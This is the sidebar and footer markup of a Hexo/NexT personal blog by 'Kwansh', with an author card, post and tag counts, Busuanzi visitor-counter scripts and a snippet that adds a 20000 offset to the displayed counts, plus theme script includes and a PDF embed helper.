      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Kwansh"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">Kwansh</p>
  <div class="site-description" itemprop="description">往事越千年,魏武挥鞭,东临碣石有遗篇。萧瑟秋风今又是,换了人间</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">57</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">38</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:eminemgcxwlp@gmail.com" title="E-Mail → mailto:eminemgcxwlp@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2025\4\21 – 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Kwansh</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div>

    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">总访客数<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>
<!-- 不蒜子计数初始值纠正 -->
<script>
$(document).ready(function() {

    var int = setInterval(fixCount, 50);  // 50ms周期检测函数
    var countOffset = 20000;  // 初始化首次数据

    function fixCount() {            
       if (document.getElementById("busuanzi_container_site_pv").style.display != "none")
        {
            $("#busuanzi_value_site_pv").html(parseInt($("#busuanzi_value_site_pv").html()) + countOffset); 
            clearInterval(int);
        }                  
        if ($("#busuanzi_container_site_pv").css("display") != "none")
        {
            $("#busuanzi_value_site_uv").html(parseInt($("#busuanzi_value_site_uv").html()) + countOffset); // 加上初始数据 
            clearInterval(int); // 停止检测
        }  
    }
       	
});
</script> 


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>


  











<script>
document.querySelectorAll('.pdfobject-container').forEach(element => {
  let url = element.dataset.target;
  let pdfOpenParams = {
    navpanes : 0,
    toolbar  : 0,
    statusbar: 0,
    pagemode : 'thumbs',
    view     : 'FitH'
  };
  let pdfOpenFragment = '#' + Object.entries(pdfOpenParams).map(([key, value]) => `${key}=${encodeURIComponent(value)}`).join('&');
  let fullURL = `/lib/pdf/web/viewer.html?file=${encodeURIComponent(url)}${pdfOpenFragment}`;

  if (NexT.utils.supportsPDFs()) {
    element.innerHTML = `<embed class="pdfobject" src="${url + pdfOpenFragment}" type="application/pdf" style="height: ${element.dataset.height};">`;
  } else {
    element.innerHTML = `<iframe src="${fullURL}" style="height: ${element.dataset.height};" frameborder="0"></iframe>`;
  }
});
</script>




  

  

</body>
</html>
